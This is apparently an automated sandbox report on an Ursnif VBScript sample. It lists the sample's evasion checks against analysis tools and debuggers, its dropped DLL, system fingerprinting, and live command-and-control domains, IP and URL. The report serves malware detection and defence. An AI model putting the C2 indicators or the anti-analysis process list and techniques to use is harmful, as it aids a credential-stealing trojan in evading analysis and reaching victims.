Source: Yara match File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\start[2021.09.09_15-26].vbs Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.536145532.00000262BFE13000.00000004.00000001.sdmp Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Found evasive API chain (may stop execution after checking system information)
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 4084 Thread sleep time: -30000s >= -30000s Jump to behavior
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7034AC85 FindFirstFileExW, 23_2_7034AC85
Source: rundll32.exe, 00000017.00000003.697749575.00000000006A1000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW0
Source: rundll32.exe, 00000017.00000003.652715194.00000000006D5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

barindex
Found API chain indicative of debugger detection
Source: C:\Windows\SysWOW64\rundll32.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70340D8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_70340D8D
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70331A0A LoadLibraryA,GetProcAddress, 23_2_70331A0A
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_703483FA GetProcessHeap, 23_2_703483FA
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7034A97E mov eax, dword ptr fs:[00000030h] 23_2_7034A97E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70342485 mov eax, dword ptr fs:[00000030h] 23_2_70342485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7038F0B0 mov eax, dword ptr fs:[00000030h] 23_2_7038F0B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7038EBE6 push dword ptr fs:[00000030h] 23_2_7038EBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7038EFDF mov eax, dword ptr fs:[00000030h] 23_2_7038EFDF
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70340D8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_70340D8D

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: fum.cpp.0.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: pop.urlovedstuff.com
Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 23_2_703311BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 23_2_7034E0ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 23_2_7034E213
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 23_2_7034DA85
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 23_2_7034E319
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 23_2_7034E3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 23_2_70344CAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_7034DD27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_7034DD86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_7034DE0D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 23_2_7034DE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW, 23_2_7034DF36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_703447E8
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C26CD6 cpuid 23_2_00C26CD6
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_703310ED GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 23_2_703310ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70331F7C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 23_2_70331F7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C26CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 23_2_00C26CD6

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 481181 Sample: start[2021.09.09_15-26].vbs Startdate: 10/09/2021 Architecture: WINDOWS Score: 100 24 pop.urlovedstuff.com 2->24 30 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->30 32 Multi AV Scanner detection for domain / URL 2->32 34 Found malware configuration 2->34 36 5 other signatures 2->36 8 WmiPrvSE.exe 2->8         started        10 wscript.exe 2 2->10         started        14 WmiPrvSE.exe 3 2->14         started        signatures3 process4 file5 16 rundll32.exe 8->16         started        22 C:\Users\user\AppData\Local\Temp\fum.cpp, PE32 10->22 dropped 46 Benign windows process drops PE files 10->46 48 VBScript performs obfuscated calls to suspicious functions 10->48 50 Deletes itself after installation 10->50 52 Creates processes via WMI 10->52 signatures6 process7 process8 18 rundll32.exe 16->18         started        dnsIp9 26 atl.bigbigpoppa.com 185.251.90.253, 49789, 49790, 49791 SPRINTHOSTRU Russian Federation 18->26 28 pop.urlovedstuff.com 18->28 38 System process connects to network (likely due to code injection or exploit) 18->38 40 Found evasive API chain (may stop execution after checking system information) 18->40 42 Found API chain indicative of debugger detection 18->42 44 Writes registry values via WMI 18->44 signatures10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.251.90.253
 pop.urlovedstuff.com Russian Federation
35278 SPRINTHOSTRU true

Contacted Domains

Name IP Active
pop.urlovedstuff.com 185.251.90.253 true
atl.bigbigpoppa.com 185.251.90.253 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 true
  • Avira URL Cloud: malware
 unknown